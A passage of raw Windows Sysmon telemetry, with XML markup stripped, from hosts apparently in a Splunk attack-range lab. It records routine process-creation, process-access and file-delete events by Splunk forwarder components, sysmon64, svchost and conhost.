AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000213895Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.698{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E83E17485BBAF0B46A54061AEC531D09,SHA256=9A5198F1C937811678656F1EC821B371A871BE980B796D38439426F6BD8A7CBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284793Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:49.360{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE345057E30B8EB451A980A5DD6FC71A,SHA256=24A45CF2AB6D070BA511CB26118F1C039841A93E18AD7E72CB1AB5D7E04A70AE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213894Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.604{4F8D34B0-0DC9-6216-EB03-000000003902}9962560C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213893Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.323{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0DC9-6216-EB03-000000003902}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213892Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.323{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213891Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.323{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213890Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.323{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213889Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.323{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213888Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.323{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213887Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.323{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213886Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.323{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213885Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.323{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213884Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.323{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213883Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.323{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0DC9-6216-EB03-000000003902}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213882Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.323{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0DC9-6216-EB03-000000003902}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213881Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.324{4F8D34B0-0DC9-6216-EB03-000000003902}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000213911Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:50.714{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2F3D11D4C7231FA2E828C15DFF4AE67,SHA256=82F6A75BE927645EEA596D46116887A3F137E7E950FBEC2C5E4C42D5AE4240F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284794Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:50.375{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C197922760039AA742AB4AD6BCCC9C4,SHA256=7407CB5ABC6367B95AECC0CCB70D85D0B4089B573D2905ED1AC3CD09068DA3EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213910Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:50.339{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7FCF0EABD736774AAA204EAB8243D0EA,SHA256=C5BCB452C1ACD8DE96BD67D3283E3B4725DEE07FCA1F6BDCA30452C2233B6535,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213909Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:49.995{4F8D34B0-0DC9-6216-EC03-000000003902}3392836C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000213925Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:51.823{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC2578E0A781BB053081C1907F66DEE5,SHA256=9AC19AE9F8FBE093370A0188BDB80E1254979AB38CA7FDBC88A486BC8FBA5784,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284795Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:51.391{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F43CC63F559F697882423BDA4C5606D9,SHA256=CCDA7E80B4BC54B2C57022844A94D52DDB9CCE2A134DA8BF5A0B7451A37D6146,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213924Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:51.651{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0DCB-6216-ED03-000000003902}1988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213923Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:51.651{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213922Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:51.651{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213921Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:51.651{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213920Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:51.651{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213919Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:51.651{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213918Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:51.651{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213917Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 